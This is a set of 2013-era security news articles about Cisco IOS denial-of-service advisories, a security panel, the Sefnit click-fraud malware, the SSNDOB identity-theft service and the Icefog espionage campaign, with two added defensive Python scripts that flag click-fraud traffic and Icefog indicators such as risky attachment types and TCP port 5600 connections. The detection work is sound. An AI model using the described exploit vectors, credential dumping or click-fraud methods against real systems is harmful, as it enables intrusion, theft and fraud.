Cisco’s Product Security Incident Response Team (PSIRT) released the advisories yesterday on the Security Intelligence Operations section of its website.
More than half of the advisories deal with denial of service vulnerabilities that stem from the way the software is configured. The vulnerabilities involve the Network Time Protocol (NTP) feature, the virtual fragmentation reassembly (VFR) feature for IPv6, the network address translation (NAT) feature, the T1/E1 driver queue and the DHCP implementation of IOS. All could – under the right circumstances – allow an unauthenticated remote attacker to cause a DoS condition, either by sending maliciously crafted packets to the device or by getting the device to reload without the operator’s consent.
The other three vulnerabilities involve different components in the device.
One is tied to IOS’ Zone-Based Firewall (ZBFW) functionality. The ZBFW incorrectly processes some types of HTTP packets when the device is “configured for either Cisco IOS Content Filtering or HTTP application layer gateway inspection.” All a hacker would have to do is send malicious HTTP packets through a device to exploit it.
The second involves a problem in IOS’ Internet Key Exchange (IKE) feature that could lead to a memory leak and device reload. Much like the ZBFW vuln, IKE incorrectly handles malformed IKE packets. Some specially crafted IKE packets could cause the software to not release allocated memory, in turn causing a memory leak.
Lastly, a wedge vulnerability in the Resource Reservation Protocol (RSVP) feature can allow a hacker to trigger an “interface queue wedge” on the affected device that can lead to loss of connectivity, loss of routing protocol and in some cases, a DoS condition. An interface queue wedge is more or less a vulnerability where packets are received and queued by IOS but never removed from the queue, stifling the device and causing it to stop working.
Workarounds are available for three of the eight vulnerabilities (the NTP, interface queue wedge and T1/E1 issues); for all eight, Cisco has released free software updates that remedy the problem.
All of the updates are available on Cisco’s Security Advisories, Responses and Notices page and those deploying the updates are being asked to review their software before patching them to make sure their current configurations will continue to be supported.
Cisco IOS runs on millions of devices globally; it is the operating system on most of the company’s routers and switches and provides the routing, switching and other network functions those devices rely on. It’s the second time this year Cisco has released a large batch of patches for the product. The company also pushed out seven patches for the software in late March.
WASHINGTON–Security, like a lot of other things, tends to go in phases. A new attack technique is developed, vendors respond with a new defensive technology and then attackers find a way to defeat it. It has always been that way. And right now, things seem to be in one of those periodic down cycles in which the attackers have the upper hand.
In the past, what’s helped break this cycle is innovation, a new technology or architecture that helps swing things back in the other direction. At least temporarily. Security executives at some of the larger financial institutions and network operators in the world, speaking on a panel here Wednesday, said that the time has come for another such shake-up.
“I think we’re in a security rut right now,” Ed Amoroso, chief security officer at AT&T, said during the panel discussion at the Billington Cybersecurity Summit.
The problem at hand is that while attackers have been adapting and changing their techniques and methods rapidly over the course of the last couple of years, the defensive community has yet to catch up and make the changes necessary to restore some semblance of order. Attackers, like those behind the newly discovered Icefog attack, have the upper hand in many respects, not the least of which is in having the luxury of time to surveil their targets, learn the lay of the land and find the weak spots they need to get in. Security teams, even well-organized and experienced ones, are at a disadvantage in this equation. Even if an attack is discovered in process, it’s sometimes difficult to tell what’s been taken, how long the attackers had access to the network and which machines have been compromised.
As the maxim goes, the attackers only need to be right once, while the defenders have to be right all the time.
Changing that state of affairs won’t happen overnight and the path to that destination certainly isn’t free of obstacles. It may require changing some of the fundamental processes and systems that have been mainstays of the security infrastructure for decades. Authentication, for example. Considered a foundational technology for as long as computers have been around, authentication may have outlived its usefulness.
“In my world, authentication isn’t a word that we’re using anymore,” said Charles Blauner, global head of information security at Citi, who was part of the Billington panel. “It’s time to move beyond that. For us, we’re thinking in terms of recognition rather than authentication. It’s about having the system say, ‘I recognize you’, and go from there.”
One of the things that’s been touted as a fix for the authentication problem is biometric technology. The thinking goes that requiring a user to employ both a password and something like a fingerprint or iris scan makes it much more difficult for an attacker to impersonate him. However, not all biometrics are created equal, Amoroso said.
“There are two flavors of biometrics. One is flavor A, where you store the fingerprint locally on the device and it’s used there,” he said. “Flavor B, you take biometric and send it out over the wire and it’s stored in a central database. Once it goes over the wire, it can be compromised. And it can’t be changed. So I think flavor A is good, but flavor B needs some work.”
Change comes slowly in security, but it may be time to speed things up.
A malware family, likely developed by the same authors who built a massive botnet recently discovered on the Tor network, has been revived with a stealthy new click-fraud scam.
Microsoft reports a rash of new click-fraud activity linked to the Sefnit malware, which was thought dead and buried as of 2011, Microsoft Malware Protection Center researcher Geoff McDonald wrote in a blogpost this week.
McDonald said Microsoft discovered a new click-fraud component to the Sefnit malware in June, one that uses the open source 3proxy project. Originally, Microsoft said, it had classified the click-fraud portion of Sefnit as the Mevade malware; it now considers them to be of the same family.
“The botnet of Sefnit-hosted proxies are used to relay HTTP traffic to pretend to click on advertisements,” McDonald said.
Using the proxies keeps the noise level down on Sefnit activity, unlike previous versions of the malware which would hijack clicks from search engine results, sending those clicks through an agency to a webpage resembling the user’s destination.
“These clicks are generally considered quite high value and are hard to detect from an antifraud perspective,” McDonald said.
There was nothing stopping observant users, however, from noticing that they had not landed on the site they were looking for and reporting the issue to a security researcher, Microsoft said. The unwanted attention, experts thought, caused the Sefnit gang to close up shop.
In June, the malware was found again, operating as a proxy service built on 3proxy.
“The new version of Sefnit exhibits no clear visible user symptoms to bring attention to the botnet,” McDonald said. “This allowed them to evade attention from antimalware researchers for a couple years.”
The botnet of proxies now sends requests, or phony ad clicks, through a network of affiliate search programs such as mywebsearch[.]com and legitimate ad agencies to eventually defraud a legitimate advertiser.
Microsoft provides an example using Groupon. The Sefnit authors are likely a mywebsearch affiliate, and use the proxy service to redirect traffic to the affiliate to “fake a click” on a Google ad on the Groupon site, defrauding Groupon in the process. The retailer must pay Google for the phony click; Google takes its share and in turn pays out the rest to the mywebsearch affiliate.
To keep the scam persistent, the malware authors have built time lags into the scheme so that the malware will not click too often on the ads, alerting antifraud services.
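The two traits the post attributes to the revived Sefnit, clicks relayed through proxy nodes with no user in front of the browser, and deliberate pacing so the clicks do not come too often, are exactly what an ad-side antifraud check can look for. The following is an added example, not Microsoft’s code or data: it scores clients in a constructed ad-traffic log on how many clicks arrive with no preceding page view and on how machine-regular the gaps between clicks are. The log format, hosts, URLs and thresholds are all assumptions for the demo.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed ad-traffic log (not Microsoft's data): timestamp, client, event, URL.
# 10.0.0.5 behaves like a person: each click follows a page view at irregular gaps.
# 10.0.0.9 behaves like a Sefnit proxy node: clicks with no page view, evenly spaced.
SAMPLE_LOG = """\
2013-09-25T10:00:00 10.0.0.5 view  http://deals.example/offer
2013-09-25T10:00:07 10.0.0.5 click http://ads.example/click?aff=1234
2013-09-25T10:41:12 10.0.0.5 view  http://deals.example/offer
2013-09-25T10:42:01 10.0.0.5 click http://ads.example/click?aff=1234
2013-09-25T12:05:33 10.0.0.5 view  http://deals.example/offer
2013-09-25T12:06:10 10.0.0.5 click http://ads.example/click?aff=1234
2013-09-25T10:00:00 10.0.0.9 click http://ads.example/click?aff=1234
2013-09-25T10:30:00 10.0.0.9 click http://ads.example/click?aff=1234
2013-09-25T11:00:00 10.0.0.9 click http://ads.example/click?aff=1234
2013-09-25T11:30:00 10.0.0.9 click http://ads.example/click?aff=1234
"""


def parse_log(text):
    """Yield (timestamp, client, event, url) tuples; malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, event, url = parts
        yield datetime.fromisoformat(ts), client, event, url


def score_clients(text, view_window=600):
    """Per client: number of clicks, fraction of clicks with no page view in the
    preceding view_window seconds, and the coefficient of variation of the gaps
    between clicks (near 0 means machine-regular timing; None if too few clicks)."""
    by_client = defaultdict(list)
    for ts, client, event, _ in parse_log(text):
        by_client[client].append((ts, event))
    scores = {}
    for client, events in by_client.items():
        events.sort()
        clicks, viewless, last_view = [], 0, None
        for ts, event in events:
            if event == "view":
                last_view = ts
            elif event == "click":
                clicks.append(ts)
                if last_view is None or (ts - last_view).total_seconds() > view_window:
                    viewless += 1
        gaps = [(b - a).total_seconds() for a, b in zip(clicks, clicks[1:])]
        cv = pstdev(gaps) / mean(gaps) if len(gaps) >= 2 and mean(gaps) > 0 else None
        scores[client] = {
            "clicks": len(clicks),
            "viewless_fraction": viewless / len(clicks) if clicks else 0.0,
            "interval_cv": cv,
        }
    return scores


def flag_clients(text, min_clicks=3, max_cv=0.1, max_viewless=0.5):
    """Clients with enough clicks that are either clicking without viewing or
    clicking on a suspiciously regular schedule."""
    flagged = []
    for client, s in score_clients(text).items():
        if s["clicks"] < min_clicks:
            continue
        regular = s["interval_cv"] is not None and s["interval_cv"] <= max_cv
        if s["viewless_fraction"] > max_viewless or regular:
            flagged.append(client)
    return sorted(flagged)


if __name__ == "__main__":
    for client, s in score_clients(SAMPLE_LOG).items():
        print(client, s)
    print("flagged:", flag_clients(SAMPLE_LOG))
```

A real deployment would add jitter-aware tests, since a botnet author who reads this can randomize the delay; the viewless-click signal is the more durable one, because the proxy relay the post describes never loads the page it pretends to have clicked from.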
Microsoft said the Sefnit Trojan is being spread alongside legitimate installations of the File Scout application, also developed by the Sefnit gang.
“Specifically, it expects a similar format xml structure for the C&C-download and execute commands, both applications are distributed together, and the two applications were compiled 15 minutes apart with the same compiler,” McDonald said.
Sefnit is also spreading on some InstallBrain software bundler installers and through the eMule peer-to-peer network.
“The authors have adapted their click fraud mechanisms in a way that takes user interaction out of the picture while maintaining the effectiveness,” McDonald said. “This removal of the user-interaction reliance in the click fraud methodology was a large factor in the Sefnit authors being able to stay out of the security-researchers’ radars over the last couple of years.”
Mevade, meanwhile, caused a stir in mid-August when experts realized the number of Tor users had skyrocketed from 500,000 to close to 3 million and speculated that a botnet had set up shop on the network and the botmaster was using it to communicate with compromised hosts and to avoid potential takedown attempts.
The decision to move to Tor, however, was its undoing. Experts at Damballa Labs said the influx of Tor users drew unwanted attention to the botnet leading to its detection. Researcher Mark Gilbert told Threatpost that the botmaster was likely renting out portions of the Mevade botnet for click-fraud, adware scams and even data exfiltration.
An online peddler of Social Security numbers, credit and background check reports, and other information valuable to identity thieves appears to have ascertained this data by compromising the systems of a number of prominent data brokerage firms, according to an investigative report published by security reporter Brian Krebs.
The website is SSNDOB[dot]MS and Krebs characterizes it as an “identity theft service.” Whoever is responsible for the service, the report claims, compromised and installed botnet malware on the systems of a number of prominent data firms, including two servers at the legal database company LexisNexis, another two servers at Dun & Bradstreet, a New Jersey-based collector of corporate licensure information, and a fifth server belonging to an employment background screening company called Kroll Background America Inc.
The malware-infected servers transmitted data from these systems to a command and control server under the control of SSNDOB’s operators, supplying some amount of the information sold on that site. Krebs ran the malware samples through VirusTotal, a website that scans malicious files to see which antivirus products will detect them, in early September. None of the 46 engines used by VirusTotal detected the threat. At publication, Krebs said, the total had risen to six of 46.
Over the summer, the site was compromised, giving Krebs and others access to the entire database. An examination of that database revealed that the site had some 1,300 customers that spent hundreds of thousands of dollars collecting the SSNs, birth dates, drivers license records, and the credit and background check information of more than four million U.S. citizens.
The source of all this data remained unknown until a group of hackers apparently associated with the UGNazi hacktivist collective used SSNDOB to accrue data for another website, exposed[dot]su, that publishes various information about celebrities and prominent public figures. Beyonce, Jay Z, First Lady Michelle Obama, CIA Director John Brennan, and former FBI Director Robert Mueller are among the individuals whose information could be found on the site, according to Krebs. The information on this second site highlighted the thoroughness of SSNDOB’s access to sensitive information, but it wasn’t until the site was later compromised that Krebs was able to examine the entire database.
Beyond statistical information, the compromise of SSNDOB gave Krebs the ability to analyze the network activity there, which in turn led him to the existence of the botnet fueling the service.
SSNDOB has been running for two years, offering personal information such as SSNs and birth records for between 50 cents and $2.50 and credit background check information for between $5 and $15, according to the report.
Krebs writes that LexisNexis confirmed the compromise, Dun & Bradstreet told Krebs the information he provided was “very helpful,” and Kroll Background America’s parent company, Altegrity, neither confirmed nor denied the compromise. All three companies are coordinating with law enforcement and the FBI is “aware of and investigating the case.”
An espionage campaign featuring precise targeting of victims and malware that allows the attackers one-on-one interaction with compromised systems has been uncovered. Government agencies, manufacturers, high tech companies and media organizations in South Korea and Japan have been the primary targets of the campaign called Icefog, which was reported today by researchers at Kaspersky Lab.
The China-based campaign is two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.
However, while other APT campaigns maintain a long-term persistence inside infected networks, Icefog seems to do just the opposite. The attackers, Kaspersky researchers said, know what they need from a victim and once they have it, the target is abandoned. They’re also likely a small group of hired guns, akin to mercenaries, used to attack a particular group, steal data, and get out quickly.
“We’ve entered the era of a growing number of these smaller, agile groups hired on a per-project basis,” said Kaspersky Lab researcher Kurt Baumgartner, speaking today at the Billington Cybersecurity Summit in Washington, D.C. “The operational improvements have arrived and these polished APT groups become much better at flying under the radar.
“Finding a pattern in all the noise is not easy. It’s becoming harder and harder to identify the patterns and connect them with a group,” Baumgartner said.
To date, Kaspersky Lab’s Global Research and Analysis Team has observed six variants of Icefog and has been able to sinkhole 13 domains used in the attack, capturing snapshots of the malware used and logs detailing victims and interaction with command and control servers.
Windows and Mac OS X versions of Icefog have also been observed, but it appears the OS X backdoor is merely a beta trial of the malware, largely found on Chinese online bulletin boards. Meanwhile, more than 200 unique Windows-based IP addresses have connected to a Kaspersky-controlled sinkhole, a fraction of the total infections, researchers said.
“There’s a team of operators that are being very selective and going after exactly what they need,” said Baumgartner. “It’s classic APT behavior. They likely have previous knowledge of the networks and targets.”
Those targets include defense industry contractors such as LIG Nex1 and Selectron Industrial Company, shipbuilding companies DSME Tech and Hanjin Heavy Industries, telecom operators such as Korea Telecom and media companies such as Fuji TV.
Icefog not only establishes a backdoor connection to the attacker-controlled command infrastructure, but it also drops a number of tools that allow the attackers to steal certain document types and pivot within an infected company looking for more computers to infect and additional resources to steal.
The campaign also relies on exploits for vulnerabilities that have already been patched in Microsoft Office components or Java to establish a foothold on an endpoint. Remote code execution bugs in the Windows common controls used by Office (CVE-2012-0158 and CVE-2012-1856), triggered by malicious Word or Excel files, are the most common means of initiating the Icefog attack. The infected attachments promise anything from an illicit image of a woman to a document written in Japanese titled: “Little enthusiasm for regional sovereignty reform.” Users are also sent links to compromised sites hosting Java exploits (CVE-2013-0422 and CVE-2012-1723).
Separate spear phishing campaigns were also spotted using HLP files—older versions of Winhelp files—to infect targets. Winhelp was supported natively until Windows Vista was released.
Another spear phishing effort used HWP document files to spread Icefog; HWP is a proprietary document format used in South Korea, in particular by the government.
Once a machine is compromised, the attackers individually analyze system information and files stored on the machine and if it passes muster, the backdoor and lateral movement tools are remotely sent to the machine, including password and hash-dumping tools for saved Internet Explorer and Outlook passwords. A compression program is also sent down to compress stolen data before it’s sent to the command and control server. Beyond credentials, victims are losing Windows address book files (.WAB), as well as HWP, Excel and Word files.
Of the six variants, the oldest, from 2011, was used in an attack against Japan’s House of Representatives and House of Councillors. Six AOL email addresses were used and commands were also fetched from these accounts.
The most commonly seen Icefog variant is called Type 1 and it has all the backdoor and lateral movement capabilities described earlier, as well as giving the attackers access to execute SQL commands on SQL Servers found on the network. It’s here where the term Icefog was seen in a string used in the command and control server (the C&C software is named Dagger Three). The command and control script, meanwhile, provides a professional looking interface used to communicate and interact with compromised machines. It uses the native file system to store stolen data and temporary files.
“Perhaps the most interesting part is that the Type 1 C&C panel maintains a full history of the attacker’s interaction with the victims,” the report said. “This is kept as an encrypted logfile, in the ‘logs’ directory on the server. In addition to that, the server maintains full interaction logs and command execution results from each victim.”
Another variant was used to enhance Type 1 infections with additional encryption obfuscating communication with command servers. It was not used against victims and disappeared once a machine was rebooted.
Samples for two other variants have yet to be obtained, but Kaspersky was able to sinkhole three domains used with these attacks. These two variants had only view and update capabilities.
The most recent version, Icefog-NG, doesn’t communicate with a central command server and instead of using a webserver, its command and control is a Windows desktop application that works as a standalone TCP server listening on port 5600.
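Two of the details above translate directly into hunting checks: the spear-phishing attachments (.doc/.xls carrying the MSCOMCTL exploits, legacy .hlp WinHelp files, and .hwp Hangul documents) and Icefog-NG’s controller being a standalone TCP listener on port 5600, which makes an infected workstation show up as the client side of an outbound TCP/5600 connection. The following is an added example, not Kaspersky’s code or data: it runs both checks over constructed mail-gateway and flow records. File names, addresses and the CSV layouts are assumptions for the demo.

```python
import csv
import io
from collections import Counter
from pathlib import PurePosixPath

# Constructed mail-gateway records (not Kaspersky's data): sender, recipient,
# attachment file name. Lure names are placeholders.
MAIL_LOG = """sender,recipient,attachment
news@freemail.example,analyst@corp.example,regional_sovereignty_reform.doc
hr@corp.example,analyst@corp.example,schedule.xlsx
unknown@freemail.example,exec@corp.example,readme.hlp
partner@example.kr,legal@corp.example,contract.hwp
"""

# Constructed flow records: src, dst, dport, proto. Icefog-NG's controller is
# a desktop program listening on TCP 5600, so an infected workstation appears
# as the *client* of an outbound TCP/5600 connection.
FLOW_LOG = """src,dst,dport,proto
10.1.2.3,203.0.113.10,5600,tcp
10.1.2.4,203.0.113.11,443,tcp
10.1.2.3,203.0.113.10,5600,tcp
10.1.2.7,198.51.100.5,5600,udp
"""

# Attachment types named in the campaign write-up; the reasons are for the analyst.
RISKY_EXTENSIONS = {
    ".hlp": "legacy WinHelp file; not natively supported since Vista, rarely legitimate",
    ".hwp": "Hangul Word Processor document; lure format used against South Korean targets",
    ".doc": "Word document; exploit vector for CVE-2012-0158 / CVE-2012-1856",
    ".xls": "Excel document; exploit vector for CVE-2012-0158 / CVE-2012-1856",
}


def suspicious_attachments(mail_csv, risky=RISKY_EXTENSIONS):
    """Return (recipient, attachment, reason) for every attachment whose
    extension is on the watch list. The match is case-insensitive."""
    hits = []
    for row in csv.DictReader(io.StringIO(mail_csv)):
        ext = PurePosixPath(row["attachment"]).suffix.lower()
        if ext in risky:
            hits.append((row["recipient"], row["attachment"], risky[ext]))
    return hits


def icefog_ng_candidates(flow_csv, port=5600):
    """Count outbound TCP connections to the Icefog-NG listener port per
    (src, dst) pair. A hit is a lead to verify, not proof of infection: 5600 is
    not a reserved port and other software may legitimately use it."""
    counts = Counter()
    for row in csv.DictReader(io.StringIO(flow_csv)):
        if row["proto"].lower() == "tcp" and int(row["dport"]) == port:
            counts[(row["src"], row["dst"])] += 1
    return counts


if __name__ == "__main__":
    for hit in suspicious_attachments(MAIL_LOG):
        print("attachment:", *hit)
    for pair, n in icefog_ng_candidates(FLOW_LOG).items():
        print("tcp/5600:", pair, n)
```

An extension check is only a first pass: a gateway should also inspect the file header, since a renamed document still opens in the application the exploit targets, and the .doc/.xls hits are useful mainly when paired with a sender outside the organization and an unpatched Office install on the recipient’s machine.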
Kaspersky said it first obtained an Icefog sample in June after an attack on Fuji TV. It was able to connect the dots back to the attack on the Japanese parliament two years ago.
“We predict the number of small, focused APT-for-hire groups to grow, specializing in hit-and-run operations, a kind of ‘cyber-mercenaries’ of the modern world,” the report said.